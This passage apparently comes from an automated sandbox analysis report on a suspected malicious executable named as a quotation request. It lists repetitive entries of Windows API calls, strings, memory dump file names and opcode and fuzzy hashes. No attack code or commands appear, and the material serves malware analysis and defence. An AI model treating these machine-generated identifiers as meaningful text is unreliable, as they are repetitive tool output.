                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dd0a91ca5e41458d40a7dd2483d9f0107040614a073402ee9870d4d63f33d5fa
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A711B2B1100104ABEF506F68DC40EEF3769EB05378F614B29F964972E0C739DC919758
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _memset.LIBCMT ref: 00462A22
                                                                                                                                                                                                                              • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00462A41
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: InfoItemMenu_memset
                                                                                                                                                                                                                              • String ID: 0
                                                                                                                                                                                                                              • API String ID: 2223754486-4108050209
                                                                                                                                                                                                                              • Opcode ID: 751c536b083c9adfecd4a8c2834bb49aa0f4764eac95f6b1a2dda81446ac4081
                                                                                                                                                                                                                              • Instruction ID: fa89ad59b694463807a05e008f151e0ce3f2ba89f6cc59c0a4ca2f54b8788f6f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 751c536b083c9adfecd4a8c2834bb49aa0f4764eac95f6b1a2dda81446ac4081
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EA11B172A01915BACB30DA98DA44BDF73A8AB45304F044027E855B7290E7F8AD0AC79A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0047222C
                                                                                                                                                                                                                              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00472255
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Internet$OpenOption
                                                                                                                                                                                                                              • String ID: <local>
                                                                                                                                                                                                                              • API String ID: 942729171-4266983199
                                                                                                                                                                                                                              • Opcode ID: 75e9458716a39df8dc3ccd06a53274ec1d022472b75fdff4666a046931244d06
                                                                                                                                                                                                                              • Instruction ID: 87a968fd796eb7ebd351e14a87864fbf4782faaabfad8c695b3487e96fec79d3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 75e9458716a39df8dc3ccd06a53274ec1d022472b75fdff4666a046931244d06
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2C113270101221BADB248F118D84EFBFBACFF0A351F10C66BF90892200D2B49881D6F9
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00403C14,004C52F8,?,?,?), ref: 0041096E
                                                                                                                                                                                                                                • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                                                                                                                                                                                                              • _wcscat.LIBCMT ref: 00444CB7
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FullNamePath_memmove_wcscat
                                                                                                                                                                                                                              • String ID: SL
                                                                                                                                                                                                                              • API String ID: 257928180-181245872
                                                                                                                                                                                                                              • Opcode ID: 51d74b1989755c53183aee132601f2e45a628d82cf1f90107cdd3f9f5a0d9d06
                                                                                                                                                                                                                              • Instruction ID: 43824745660c3988bd5ee8fabd2b32f2c8f8042702d18c831ff1fab54f9b3e1b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 51d74b1989755c53183aee132601f2e45a628d82cf1f90107cdd3f9f5a0d9d06
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: ED118274A15208AACB40EB648945FDD77B8AF08354B0044ABB948E7291EAB8B6C4471D
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                                                                                                                                                                • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                                                                                                                                                                                              • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00458E73
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ClassMessageNameSend_memmove
                                                                                                                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                                                                                                                              • API String ID: 372448540-1403004172
                                                                                                                                                                                                                              • Opcode ID: 9946c7197ab10ad9fde50dae1b7c0277909534bd518ba67c60e97b676ced7028
                                                                                                                                                                                                                              • Instruction ID: b8e2c670fbb7cccfe9550cd9997642be974785ccb83f9afd7f496d9e06e76b61
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9946c7197ab10ad9fde50dae1b7c0277909534bd518ba67c60e97b676ced7028
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4001F971601118ABCF14FBA1CC429FE7368EF01320B100A2FBC25772D2DE39580CC655
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                                                                                                                                                                • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000180,00000000,?), ref: 00458D6B
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ClassMessageNameSend_memmove
                                                                                                                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                                                                                                                              • API String ID: 372448540-1403004172
                                                                                                                                                                                                                              • Opcode ID: d0242bd35a47d84e43d9a51d6d7b20f2831aa5b35d47bc754fff3bab3a4422aa
                                                                                                                                                                                                                              • Instruction ID: f717951ca8db0a39ae808ededaa33f35f94e61068a96ac8ac9a889606be0a7e6
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d0242bd35a47d84e43d9a51d6d7b20f2831aa5b35d47bc754fff3bab3a4422aa
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1701B1B1A41108ABCF14EBA1C952AFF73A8DF15341F10042FB805772D2DE285E0CD67A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                                                                                                                                                                • Part of subcall function 0045AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0045AABC
                                                                                                                                                                                                                              • SendMessageW.USER32(?,00000182,?,00000000), ref: 00458DEE
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ClassMessageNameSend_memmove
                                                                                                                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                                                                                                                              • API String ID: 372448540-1403004172
                                                                                                                                                                                                                              • Opcode ID: ca68f18a7fa7c3bde14d10b92c765e559fdd9fc37852c13f41fffdb9c198d947
                                                                                                                                                                                                                              • Instruction ID: a21a4701c09283d063fe79b367182633aa51a9950eb7d0e2c1ab54a0e2954309
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ca68f18a7fa7c3bde14d10b92c765e559fdd9fc37852c13f41fffdb9c198d947
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 36018FB1A41109ABDB11EAA5C942AFF77A8DF11301F20052FBC05732D3DE295E1DD67A
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • VariantInit.OLEAUT32(?), ref: 0045C534
                                                                                                                                                                                                                                • Part of subcall function 0045C816: _memmove.LIBCMT ref: 0045C860
                                                                                                                                                                                                                                • Part of subcall function 0045C816: VariantInit.OLEAUT32(00000000), ref: 0045C882
                                                                                                                                                                                                                                • Part of subcall function 0045C816: VariantCopy.OLEAUT32(00000000,?), ref: 0045C88C
                                                                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 0045C556
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Variant$Init$ClearCopy_memmove
                                                                                                                                                                                                                              • String ID: d}K
                                                                                                                                                                                                                              • API String ID: 2932060187-3405784397
                                                                                                                                                                                                                              • Opcode ID: 9b1aca60acbf213d6da9471b2b02533c98583e4ee9509d3790eb0f545b09e1ee
                                                                                                                                                                                                                              • Instruction ID: 9b6b4eac42ae89553be157e2085c7612e92dc5081679660b2cee5bd476f3b436
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9b1aca60acbf213d6da9471b2b02533c98583e4ee9509d3790eb0f545b09e1ee
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 401130B18007089FC710DFAAC8C089AF7F8FF18314B50852FE58AD7612E734AA48CB54
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ClassName_wcscmp
                                                                                                                                                                                                                              • String ID: #32770
                                                                                                                                                                                                                              • API String ID: 2292705959-463685578
                                                                                                                                                                                                                              • Opcode ID: 9645843bb023f01be4ce20977d6b38402124eff568dd58de57c01e48d443021a
                                                                                                                                                                                                                              • Instruction ID: c10ae28a8aa268df33283df1156ce4f732750d60ee08a51e76ed462bd539b068
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9645843bb023f01be4ce20977d6b38402124eff568dd58de57c01e48d443021a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 91E0D13260023837E7209B55AC45FA7F7ACDB55B71F11006BFD04D3151D5649A45C7E5
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 0043B314: _memset.LIBCMT ref: 0043B321
                                                                                                                                                                                                                                • Part of subcall function 00420940: InitializeCriticalSectionAndSpinCount.KERNEL32(004C4158,00000000,004C4144,0043B2F0,?,?,?,0040100A), ref: 00420945
                                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,0040100A), ref: 0043B2F4
                                                                                                                                                                                                                              • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0040100A), ref: 0043B303
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0043B2FE
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1677604157.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1677488380.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1678135314.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680412529.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680462523.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1680834471.00000000004EC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1681040162.00000000004F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_REQUEST FOR QUOTATION 1307-RFQ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                                                                                                                                                                              • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                                              • API String ID: 3158253471-631824599
                                                                                                                                                                                                                              • Opcode ID: 1d2e9604d48c8e7db41109c9ed8690ec6c36f65431277a35350cc55d3018cbc9
                                                                                                                                                                                                                              • Instruction ID: 2b780658d3da49ad9f9e4503d56df9c93059da648c8d5ac8478d33f484e7c10e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1d2e9604d48c8e7db41109c9ed8690ec6c36f65431277a35350cc55d3018cbc9
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 02E06DB02007208BD720AF29E5047467AE4EF14308F00897EE856C7341EBB8E488CBA9